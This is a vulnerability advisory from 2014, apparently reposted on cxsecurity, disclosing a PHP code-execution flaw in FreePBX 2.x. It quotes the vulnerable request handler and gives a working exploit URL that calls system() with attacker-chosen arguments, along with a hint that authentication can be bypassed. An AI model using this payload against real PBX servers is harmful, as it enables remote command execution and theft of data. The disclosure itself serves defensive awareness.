Bug: FreePBX 2.x Code Execution ( Ascii Version )

Search:
WLB2

FreePBX 2.x Code Execution

Published
Credit
Risk
2014.02.12
i-Hmx
High
CWE
CVE
Local
Remote
N/A
N/A ( Add )
No
Yes

App : Freepbx 2.x
download : schmoozecom.com
Author : i-Hmx
mail : n0p1337@gmail.com
Home : sec4ever.com , secarrays ltd

Freepbx is famous asterisk based distro used world wide , it suffer from many vulns actually
simple one is included here just as a "knock knock" for the "schmoozecom" team ;)
Here you will see damn obvious PHP code Execution vuln , which can be upgraded to RCE and also dump all box's data
You can have a look if you are interested

File : admin/libraries/view.functions.php

function fileRequestHandler($handler, $module = false, $file = false){
global $amp_conf;

switch ($handler) {
case 'reload':
// AJAX handler for reload event
$response = do_reload();
header("Content-type: application/json");
echo json_encode($response);
break;
case 'file':
/** Handler to pass-through file requests
* Looks for "module" and "file" variables, strips .. and only allows normal filename
characters.
* Accepts only files of the type listed in $allowed_exts below, and sends the corresponding mime-type,
* and always interprets files through the PHP interpreter. (Most of?) the freepbx environment is available,
* including $db and $astman, and the user is authenticated.
*/
if (!$module || !$file) {
die_freepbx("unknown");
}
//TODO: this could probably be more efficient
$module = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$module));
$file = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$file));

$allowed_exts = array(
'.js' => 'text/javascript',
'.js.php' => 'text/javascript',
'.css' => 'text/css',
'.css.php' => 'text/css',
'.html.php' => 'text/html',
'.php' => 'text/html',
'.jpg.php' => 'image/jpeg',
'.jpeg.php' => 'image/jpeg',
'.png.php' => 'image/png',
'.gif.php' => 'image/gif',
);
foreach ($allowed_exts as $ext=>$mimetype) {
if (substr($file, -1*strlen($ext)) == $ext) {
$fullpath = 'modules/'.$module.'/'.$file;
if (file_exists($fullpath)) {
// file exists, and is allowed extension

// image, css, js types - set Expires to 24hrs in advance so the client does
// not keep checking for them. Replace from header.php
if (!$amp_conf['DEVEL']) {
header('Expires: '.gmdate('D, d M Y H:i:s', time() + 86400).' GMT', true);
header('Cache-Control: max-age=86400, public, must-revalidate',true);
}
header("Content-type: ".$mimetype);
ob_start();
include($fullpath);
ob_end_flush();
exit();
}
break;
}
}
die_freepbx("../view/not allowed");
break;
case 'api':
if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
$function = $_REQUEST['function'];
$args = isset($_REQUEST['args'])?$_REQUEST['args']:'';

//currently works for one arg functions, eventually need to clean this up to except more args
$result = $function($args);
$jr = json_encode($result);
} else {
$jr = json_encode(null);
}
header("Content-type: application/json");
echo $jr;
break;
}
exit();
}

Function is called at admin/config.php at line 132

if (!in_array($display, array('noauth', 'badrefer'))
&& isset($_REQUEST['handler'])
) {
$module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
$file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
fileRequestHandler($_REQUEST['handler'], $module, $file);
exit();
}

Well , it's easy to be exploitd to get any php function executed
eg. system
config.php?handler=api&function=system&args=id
usually it require authentication , but using your mind you can get around it smoothly ;)
that's it

Sollution?
of course i would never leave you @ sec nightmares , just modify your firewall Rules and don't make your box exposed to
the nasty internet world :D

can you sleep well now?
of course not , you may be already compromised and also backdoored with super tiny php backdoor , so you'd better to
remove all php data,
download latest upgrade from schmoozecom , reboot your box and you are safe . . (Temporary) ;)

Have a good day

./Faris <The Awsome>

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version